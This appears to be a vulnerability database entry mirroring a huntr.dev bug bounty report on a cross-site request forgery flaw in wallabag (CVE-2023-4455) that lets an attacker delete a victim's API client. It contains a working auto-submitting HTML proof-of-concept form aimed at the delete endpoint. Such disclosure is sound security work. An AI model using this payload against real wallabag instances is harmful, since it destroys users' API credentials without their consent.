Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrTht19975AB1B206-5FE8-4737-B275-D705E76F193A
HistoryMar 31, 2023 - 5:00 p.m.

CSRF leading to delete Client API in API clients management

2023-03-3117:00:24
tht1997
www.huntr.dev
8
csrf
vulnerability
wallabag
api client deletion
bug bounty

EPSS

0.001

Percentile

26.5%

JSON

Description

wallabag was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete API key via

client/delete/{id}

Proof of Concept

<html>
  
  <body>
    <form action="http://192.168.125.133/developer/client/delete/2">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Related

osv 2
cvelist 1
prion 1
veracode 1
nvd 1
cve 1
github 1
osv
osv
Wallabag user can delete own API client unintentionally
2023-08-21 20:28:03
CVE-2023-4455
2023-08-21 10:15:10
cvelist
cvelist
CVE-2023-4455 Cross-Site Request Forgery (CSRF) in wallabag/wallabag
2023-08-21 09:27:12
prion
prion
Cross site request forgery (csrf)
2023-08-21 10:15:00
veracode
veracode
Cross-Site Request Forgery (CSRF)
2023-08-22 04:11:26
nvd
nvd
CVE-2023-4455
2023-08-21 10:15:10
cve
cve
CVE-2023-4455
2023-08-21 10:15:10
github
github
Wallabag user can delete own API client unintentionally
2023-08-21 20:28:03

EPSS

0.001

Percentile

26.5%

JSON
Related for 5AB1B206-5FE8-4737-B275-D705E76F193A
osv2cvelist1prion1veracode1nvd1cve1github1